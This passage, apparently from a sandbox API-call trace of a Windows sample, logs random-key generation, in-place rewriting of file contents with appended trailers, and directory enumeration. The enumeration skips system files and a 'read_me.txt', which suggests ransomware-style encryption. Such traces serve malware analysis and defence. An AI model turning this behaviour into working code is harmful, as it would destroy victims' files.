Size=0x8) returned 0x7d47cb8 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0074.919] GetProcessHeap () returned 0x280000 [0074.919] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d533e8 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d533e8 | out: hHeap=0x280000) returned 1 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.920] GetProcessHeap () returned 0x280000 [0074.920] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0074.921] GetProcessHeap () returned 0x280000 [0074.921] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3d8 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0074.922] SetFilePointerEx (in: hFile=0x7c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0074.922] WriteFile (in: hFile=0x7c0, lpBuffer=0x7d531d8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d531d8*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0074.922] WriteFile (in: hFile=0x7c0, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0074.922] GetProcessHeap () returned 0x280000 [0074.922] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0074.922] CloseHandle (hObject=0x7c0) returned 1 [0074.923] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 8 [0076.971] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.971] ReadFile (in: hFile=0x808, lpBuffer=0x752fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x752fd4c*, lpNumberOfBytesRead=0x752fd08*=0x0, lpOverlapped=0x0) returned 1 [0076.971] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.971] GetProcessHeap () returned 0x280000 [0076.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0076.971] GetProcessHeap () returned 0x280000 [0076.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0076.971] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0076.971] GetProcessHeap () returned 0x280000 [0076.971] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x7dc5670 [0076.971] ReadFile (in: hFile=0x808, lpBuffer=0x7dc5670, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x752fd08, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesRead=0x752fd08*=0x499, lpOverlapped=0x0) returned 1 [0076.987] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0xfffffb67, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.987] WriteFile (in: hFile=0x808, lpBuffer=0x7dc5670*, nNumberOfBytesToWrite=0x499, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7dc5670*, lpNumberOfBytesWritten=0x752fd44*=0x499, lpOverlapped=0x0) returned 1 [0076.987] GetProcessHeap () returned 0x280000 [0076.987] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0076.987] GetProcessHeap () returned 0x280000 [0076.987] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.987] GetProcessHeap () returned 0x280000 [0076.987] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.988] GetProcessHeap () returned 0x280000 [0076.988] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.988] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0076.989] GetProcessHeap () returned 0x280000 [0076.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0076.989] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.990] GetProcessHeap () returned 0x280000 [0076.990] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.991] GetProcessHeap () returned 0x280000 [0076.991] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.991] GetProcessHeap () returned 0x280000 [0076.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0076.992] SetFilePointerEx (in: hFile=0x808, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.992] WriteFile (in: hFile=0x808, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x752fd44*=0x100, lpOverlapped=0x0) returned 1 [0076.992] WriteFile (in: hFile=0x808, lpBuffer=0x752fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x752fd44, lpOverlapped=0x0 | out: lpBuffer=0x752fd48*, lpNumberOfBytesWritten=0x752fd44*=0x4, lpOverlapped=0x0) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc5670 | out: hHeap=0x280000) returned 1 [0076.992] GetProcessHeap () returned 0x280000 [0076.992] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0076.993] GetProcessHeap () returned 0x280000 [0076.993] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0076.993] CloseHandle (hObject=0x808) returned 1 [0076.993] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 33 [0076.998] GetProcessHeap () returned 0x280000 [0076.998] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a900a8 [0076.998] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*") returned 64 [0076.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\*", lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16bcb890, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16bcb890, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0076.999] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\.") returned 64 [0076.999] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16bcb890, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16bcb890, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="..", cAlternateFileName="")) returned 1 [0076.999] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\..") returned 65 [0076.999] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x752fb60 | out: lpFindFileData=0x752fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0x2db928, dwReserved1=0x280000, cFileName="IE Add-on site.url", cAlternateFileName="IEADD-~1.URL")) returned 1 [0076.999] wnsprintfW (in: pszDest=0x8a900a8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url") returned 81 [0076.999] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x754 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="read_me.txt") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="autoexec.bat") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="desktop.ini") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="autorun.inf") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="ntuser.dat") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="iconcache.db") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="bootsect.bak") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="boot.ini") returned 0x0 [0076.999] StrStrW (lpFirst="ie add-on site.url", lpSrch="ntuser.dat.log") returned 0x0 [0077.000] StrStrW (lpFirst="ie add-on site.url", lpSrch="thumbs.db") returned 0x0 [0077.000] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 102 [0077.000] QueueUserWorkItem (Function=0x404e00, Context=0x754, Flags=0x0) returned 1 [0077.000] FindNextFileW (in: hFindFile=0x2b2638, 